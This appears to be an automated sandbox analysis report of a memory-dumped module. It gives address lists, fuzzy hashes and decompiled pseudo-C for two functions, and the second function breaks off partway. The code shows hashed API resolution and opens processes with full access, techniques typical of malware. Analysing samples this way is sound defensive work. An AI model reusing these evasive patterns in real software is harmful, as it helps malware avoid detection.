0x6eb51b51
0x6eb51b55
0x6eb51b64
0x6eb51b6d
0x6eb51b72
0x6eb51b79
0x6eb51b7d
0x6eb51b81
0x6eb51b88
0x6eb51b9a
0x6eb51bb0
0x6eb51bbb
0x6eb51bbc
0x6eb51bbd
0x6eb51bbe
0x6eb51bbf
0x6eb51bc2
0x6eb51bc6
0x6eb51bca
0x6eb51bd1
0x6eb51be3
0x6eb51bf9
0x6eb51c04
0x6eb51c05
0x6eb51c06
0x6eb51c07
0x6eb51c08
0x6eb51c0b
0x6eb51c0f
0x6eb51c13
0x6eb51c1a
0x6eb51c2c
0x6eb51c42
0x6eb51c4d
0x6eb51c4e
0x6eb51c4f
0x6eb51c50
0x6eb51c51
0x6eb51c54
0x6eb51c58
0x6eb51c5c
0x6eb51c63
0x6eb51c75
0x6eb51c8b
0x6eb51c96
0x6eb51c97
0x6eb51c98
0x6eb51c99
0x6eb51c9a
0x6eb51c9d
0x6eb51ca0
0x6eb51ca1
0x6eb51ca2
0x6eb51ca9
0x6eb51cac
0x6eb51cb7
0x6eb51cbe
0x6eb51cc7
0x6eb51ccf
0x6eb51cd6
0x6eb51cdf
0x6eb51ce7
0x6eb51cee
0x6eb51cf7
0x6eb51cff
0x6eb51d04
0x6eb51d0d
0x6eb51d15
0x6eb51d2a

Strings

8nsK, xrefs: 6EB51900

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction ID: 95c6f429f0092848ac6e283bd922a1b16d1cfa727948b8b2087ce5ca06bee03c
Opcode Fuzzy Hash: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction Fuzzy Hash: 9232F8724247469AC715EF60CC509EFFBA4EFA1208F204F0DB5895A2B2FF71E996C641

Uniqueness

Uniqueness Score: -1.00%

Function 6EB5A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6EB5A4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6EB5B658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6EB5F4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6EB5F654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6EB62234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6EB5F654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6EB5F584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6EB5F584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6eb6b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6EB63064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6EB5F4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6EB5F4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6EB5B5C4(_t439 + 0x34);
											E6EB5B5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6EB5B5C4(_t439 + 0x34);
										E6EB5B5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6EB5F4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6EB5CA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6EB5C280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6EB5F828(_t439 + 0x14, E6EB5F4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6EB5F4BC(_t439 + 0x14, E6EB5F4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6EB63064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6EB5F828(_t439 + 0x40, E6EB5F4CC(_t439 + 0x3c) + 4);
											 *(E6EB5F4BC(_t439 + 0x40, E6EB5F4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6EB5CD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6EB5F4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6EB5F4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6EB5AC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6EB5CD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6EB5F4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6EB5F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6EB5F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6EB5F4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6EB5F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6EB638F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6EB5F4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6EB5F828( *((intOrPtr*)(_t439 + 8)), E6EB5F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6EB5F4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6EB5F4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6EB5F4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6EB5F4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6EB638F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6EB5F4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6EB5F828( *((intOrPtr*)(_t439 + 4)), E6EB5F4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6EB5F828( *((intOrPtr*)(_t439 + 8)), E6EB5F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6EB5F4BC( *((intOrPtr*)(_t439 + 8)), E6EB5F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6EB5F828( *((intOrPtr*)(_t439 + 4)), E6EB5F4CC( *_t439) + 4);
								 *(E6EB5F4BC( *((intOrPtr*)(_t439 + 4)), E6EB5F4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6EB5F4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6EB63064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6EB5F4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6EB5F828( *((intOrPtr*)(_t439 + 8)), E6EB5F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6EB5F4BC( *((intOrPtr*)(_t439 + 8)), E6EB5F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6EB5F4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6EB5F828( *((intOrPtr*)(_t439 + 4)), E6EB5F4CC( *_t439) + 4);
										 *(E6EB5F4BC( *((intOrPtr*)(_t439 + 4)), E6EB5F4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6EB5F4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6EB5F4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6EB5F4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6EB5F4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6EB5F4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6EB5F4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6EB638F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6EB5F4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6EB5F828( *((intOrPtr*)(_t439 + 4)), E6EB5F4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6EB63064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6EB5F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6EB5F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6EB5F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6EB5F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6EB5F4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6EB638F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6EB5F4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6EB5F828( *((intOrPtr*)(_t439 + 8)), E6EB5F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6EB5F4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6eb5a4f2
0x6eb5a4f4
0x6eb5a4ff
0x6eb5a505
0x6eb5a509
0x6eb5a50e
0x6eb5a514
0x6eb5a524
0x00000000
0x6eb5a526
0x6eb5a526
0x6eb5a531
0x6eb5a531
0x6eb5aaaf
0x6eb5aab1
0x6eb5aab2
0x6eb5aaf1
0x6eb5aaf5
0x6eb5ab03
0x6eb5ab11
0x6eb5ab11
0x6eb5aafc
0x6eb5ab17
0x6eb5ab1c
0x00000000
0x6eb5ab1c
0x6eb5ab00
0x6eb5ab01
0x00000000
0x6eb5a53b
0x6eb5a53b
0x6eb5a53f
0x6eb5a646
0x6eb5a646
0x6eb5a64b
0x6eb5a75c
0x6eb5a760
0x6eb5a765
0x6eb5a769
0x6eb5a893
0x6eb5a895
0x6eb5a899
0x6eb5a8a2
0x6eb5a8ab
0x6eb5a8af
0x6eb5a8b8
0x6eb5a8bf
0x6eb5a8c0
0x6eb5a8c4
0x6eb5a8c8
0x6eb5a8cc
0x6eb5a8ce
0x6eb5aa38
0x6eb5aa38
0x6eb5aa40
0x6eb5aa58
0x6eb5aa5a
0x6eb5aa5c
0x6eb5aa96
0x6eb5aa96
0x6eb5aa98
0x6eb5aa98
0x6eb5aa9b
0x6eb5aab6
0x6eb5aaca
0x6eb5aacd
0x6eb5aad2
0x6eb5aadd
0x6eb5aade
0x6eb5aae1
0x6eb5aae3
0x6eb5aaec
0x00000000
0x6eb5aaec
0x6eb5aa9d
0x6eb5aaa1
0x6eb5aaaa
0x00000000
0x6eb5aaaa
0x6eb5aa6d
0x6eb5aa7d
0x6eb5aa81
0x6eb5aa81
0x6eb5aa84
0x6eb5aa87
0x6eb5aa8a
0x6eb5aa90
0x00000000
0x00000000
0x00000000
0x6eb5aa92
0x6eb5a8d6
0x6eb5a8d6
0x6eb5a8d8
0x6eb5a8dc
0x6eb5a8e1
0x6eb5a8e3
0x6eb5a8e7
0x6eb5a8ea
0x6eb5a8f2
0x6eb5a8f4
0x00000000
0x00000000
0x6eb5a90b
0x6eb5a926
0x6eb5a928
0x6eb5a93b
0x6eb5a93d
0x6eb5a93f
0x6eb5a95a
0x6eb5a95a
0x6eb5a95e
0x6eb5a960
0x00000000
0x00000000
0x6eb5a962
0x6eb5a965
0x6eb5a986
0x6eb5a9a5
0x6eb5a9ab
0x6eb5a9ae
0x6eb5a9b3
0x6eb5a9b4
0x6eb5a9b8
0x00000000
0x00000000
0x6eb5a9c0
0x6eb5a9c0
0x6eb5a9c2
0x6eb5a9ce
0x6eb5a9da
0x6eb5a9e4
0x6eb5a9e7
0x6eb5a9ea
0x6eb5a9ee
0x6eb5a9f5
0x6eb5a9f9
0x6eb5a9fd
0x6eb5a9fe
0x6eb5aa02
0x6eb5aa07
0x6eb5aa0c
0x6eb5aa10
0x6eb5aa14
0x6eb5aa1a
0x6eb5aa20
0x6eb5aa26
0x6eb5aa2c
0x6eb5aa31
0x6eb5aa32
0x6eb5aa32
0x00000000
0x6eb5a9c2
0x00000000
0x6eb5a965
0x6eb5a943
0x6eb5a954
0x6eb5a956
0x6eb5a958
0x00000000
0x00000000
0x00000000
0x6eb5a958
0x6eb5a96b
0x00000000
0x6eb5a96b
0x6eb5a76f
0x6eb5a772
0x6eb5a774
0x00000000
0x00000000
0x6eb5a77c
0x6eb5a77c
0x6eb5a77e
0x6eb5a77e
0x6eb5a78f
0x6eb5a791
0x6eb5a794
0x00000000
0x00000000
0x6eb5a88a
0x6eb5a88b
0x6eb5a88d
0x00000000
0x00000000
0x00000000
0x6eb5a88d
0x6eb5a79a
0x6eb5a79d
0x6eb5a7a7
0x6eb5a7ac
0x6eb5a7ae
0x6eb5a7b4
0x6eb5a7bb
0x6eb5a7bf
0x6eb5a7c4
0x6eb5a7c8
0x6eb5ac03
0x6eb5ac17
0x6eb5ac3a
0x6eb5ac3f
0x6eb5ac3f
0x6eb5a7df
0x6eb5a7e4
0x6eb5a7e4
0x6eb5a7e4
0x6eb5a7e4
0x6eb5a7ea
0x6eb5a7ef
0x6eb5a7f1
0x6eb5a7f6
0x6eb5a7fd
0x6eb5a802
0x6eb5a804
0x6eb5abc1
0x6eb5abd2
0x6eb5abec
0x6eb5abf1
0x6eb5abf1
0x6eb5a81a
0x6eb5a81f
0x6eb5a81f
0x6eb5a81f
0x6eb5a81f
0x6eb5a833
0x6eb5a851
0x6eb5a856
0x6eb5a866
0x6eb5a883
0x6eb5a885
0x6eb5a885
0x00000000
0x6eb5a79d
0x6eb5a653
0x6eb5a653
0x6eb5a655
0x6eb5a65c
0x6eb5a66a
0x6eb5a66c
0x6eb5a66f
0x6eb5a676
0x6eb5a678
0x6eb5a6a9
0x6eb5a6b8
0x6eb5a6ba
0x6eb5a6bc
0x6eb5a6da
0x6eb5a6dc
0x6eb5a6de
0x6eb5a6f1
0x6eb5a710
0x6eb5a716
0x6eb5a719
0x6eb5a730
0x6eb5a74c
0x6eb5a74e
0x6eb5a74e
0x6eb5a74e
0x6eb5a74e
0x6eb5a6de
0x00000000
0x6eb5a6bc
0x6eb5a67c
0x6eb5a67c
0x6eb5a67e
0x6eb5a68f
0x6eb5a691
0x6eb5a693
0x00000000
0x00000000
0x6eb5a69f
0x6eb5a6a0
0x6eb5a6a7
0x00000000
0x00000000
0x00000000
0x6eb5a6a7
0x6eb5a695
0x6eb5a698
0x00000000
0x00000000
0x6eb5a751
0x6eb5a751
0x6eb5a752
0x6eb5a752
0x00000000
0x6eb5a545
0x6eb5a547
0x6eb5a547
0x6eb5a549
0x6eb5a550
0x6eb5a55e
0x6eb5a560
0x6eb5a564
0x6eb5a568
0x6eb5a56a
0x6eb5a598
0x6eb5a59b
0x6eb5a5a0
0x6eb5a5a4
0x6eb5a5a9
0x6eb5a5b0
0x6eb5a5b5
0x6eb5a5b7
0x6eb5ab7e
0x6eb5ab8f
0x6eb5abaf
0x6eb5abb4
0x6eb5abb4
0x6eb5a5cd
0x6eb5a5d2
0x6eb5a5d2
0x6eb5a5d2
0x6eb5a5d2
0x6eb5a5e4
0x6eb5a5e6
0x6eb5a5e8
0x6eb5a5f9
0x6eb5a5f9
0x6eb5a5ff
0x6eb5a604
0x6eb5a608
0x6eb5a60e
0x6eb5a615
0x6eb5a61a
0x6eb5a61c
0x6eb5ab32
0x6eb5ab43
0x6eb5ab64
0x6eb5ab69
0x6eb5ab69
0x6eb5a633
0x6eb5a638
0x6eb5a638
0x6eb5a638
0x6eb5a638
0x6eb5a63b
0x6eb5a63b
0x00000000
0x6eb5a63b
0x6eb5a56e
0x6eb5a56e
0x6eb5a570
0x6eb5a581
0x6eb5a583
0x6eb5a585
0x00000000
0x00000000
0x6eb5a591
0x6eb5a592
0x6eb5a596
0x00000000
0x00000000
0x00000000
0x6eb5a596
0x6eb5a587
0x6eb5a58a
0x00000000
0x00000000
0x6eb5a63c
0x6eb5a63c
0x6eb5a63d
0x6eb5a63d
0x00000000
0x6eb5a549
0x6eb5a53f

Strings

, xrefs: 6EB5AAF7

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 2f23bed70dc1759deaf57798bf324a176bd7a107b2a341e59f568eec4a98c3e3
Instruction ID: b050ba38f1a900214b28bc013b988006dca7aba701ac3f10784a197f67d9244b
Opcode Fuzzy Hash: 2f23bed70dc1759deaf57798bf324a176bd7a107b2a341e59f568eec4a98c3e3
Instruction Fuzzy Hash: 721283715182819FC715EFA4C890AAEBBE9EF85704F104E2DE999973A1DB309C11CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6EB58428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6EB58428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6EB5B658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6EB5F4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6EB5F654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6EB62234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6EB5F654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6EB5F584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6EB5F584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6EB5F4BC(_t449 + 0x14, 0);
									_t180 = E6EB62908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6EB5B5C4(_t449 + 0x34);
										E6EB5B5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6EB5F4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6EB5F4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6EB5B5C4(_t449 + 0x34);
										E6EB5B5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6EB5CA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
